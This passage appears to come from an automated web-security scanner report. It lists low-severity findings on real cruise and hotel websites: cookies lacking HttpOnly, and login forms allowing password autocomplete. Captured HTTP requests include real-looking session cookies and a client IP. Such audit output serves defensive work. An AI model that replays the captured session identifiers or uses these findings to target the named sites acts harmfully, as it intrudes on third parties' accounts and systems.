<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.143. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-accommodations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-accommodations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317633066-1"
Last-Modified: Mon, 03 Oct 2011 09:11:06 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Content-Length: 43374

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.144. http://www2.ncl.com/freestyle-cruise/freestyle-dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-dining

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-dining HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317632141-1"
Last-Modified: Mon, 03 Oct 2011 08:55:41 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Content-Length: 47025

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.145. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-family-fun/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-family-fun/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 11:29:26 +0000
ETag: "1317641366-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Content-Length: 46071

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.146. http://www2.ncl.com/freestyle-cruise/golf/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/golf/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/golf/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633060-1"
Last-Modified: Mon, 03 Oct 2011 09:11:00 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Content-Length: 44665

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.147. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/hawaii-cruise-and-hotel-packages

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/hawaii-cruise-and-hotel-packages HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317631959-1"
Last-Modified: Mon, 03 Oct 2011 08:52:39 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Content-Length: 46432
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.148. http://www2.ncl.com/freestyle-cruise/nickelodeon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/nickelodeon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/nickelodeon HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317630718-1"
Last-Modified: Mon, 03 Oct 2011 08:31:58 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Content-Length: 43466

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.149. http://www2.ncl.com/freestyle-cruise/onboard-experience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/onboard-experience

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/onboard-experience HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317630975-1"
Last-Modified: Mon, 03 Oct 2011 08:36:15 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 48855

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.150. http://www2.ncl.com/freestyle-cruise/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317634785-1"
Last-Modified: Mon, 03 Oct 2011 09:39:45 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 43089

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.151. http://www2.ncl.com/freestyle-cruise/spa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/spa HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317640158-1"
Last-Modified: Mon, 03 Oct 2011 11:09:18 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Content-Length: 56334

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.152. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa-sports-and-fitness

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/spa-sports-and-fitness HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633921-1"
Last-Modified: Mon, 03 Oct 2011 09:25:21 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Content-Length: 41946

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.153. http://www2.ncl.com/ncl_inside_scoop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /ncl_inside_scoop

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ncl_inside_scoop HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645006-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Length: 7543
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 12:47:48 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.154. http://www2.ncl.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sitemap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645618-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:40:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 59876

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.155. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
13. Password field with autocomplete enabled  previous  next
There are 37 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hhonors/signup/hhonors_enroll.jhtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/hhonors/signup/hhonors_enroll.jhtml HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.hilton.com/en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.960; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635943626:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 143713
Date: Mon, 03 Oct 2011 12:58:54 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   
                           <title>Hilton HHonors (R) Enrollment Form</title>
               
               
...[SNIP]...
</div>
               <form id="login_form" onsubmit="this.prevPageTitle.value=document.title; return validateLogin();" name="loginForm" method="post" action="https://secure.hilton.com/en/hhonors/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/login_widget_hhonors.jhtml.9">
                   <input type="hidden" value="/en/hhonors/login/login.jhtml" name="/com/hilton/crm/client/handler/LoginFormHandler.failureURL">
...[SNIP]...
d('PasswordPIN').focus();"
                                               class="show-input clear"
                                               value="Password or PIN"
                                               name="passwordT"
                                               id="PasswordPINT"
                                               tabindex="5"/>
                                           <input type="password"
                                               onblur="javascript:if(this.value==''){this.className='hide-input clear';document.getElementById('PasswordPINT').value='Password or PIN';document.getElementById('PasswordPINT').className='show-input clear';}"
                                               class="hide-input clear"
                                               value=""
                                               name="password"
                                               id="PasswordPIN"
                                               tabindex="5" />
                                       
                           </span>
...[SNIP]...
13.2. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
</script>


<form name="loginForm" method="post" action="/en/hi/login/login.jhtml?_DARGS=/en/crm/login/login.jhtml" onsubmit="this.prevPageTitle.value=document.title; return validateLogin()">
   <input type="hidden" value="0" name="/com/hilton/crm/client/handler/LoginFormHandler.repeat">
...[SNIP]...
<td align=left>
                                                                       <input type="password" name="password" class="loginforminputtext01" value=""><input type="hidden" name="_D:password" value=" ">
...[SNIP]...
13.3. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

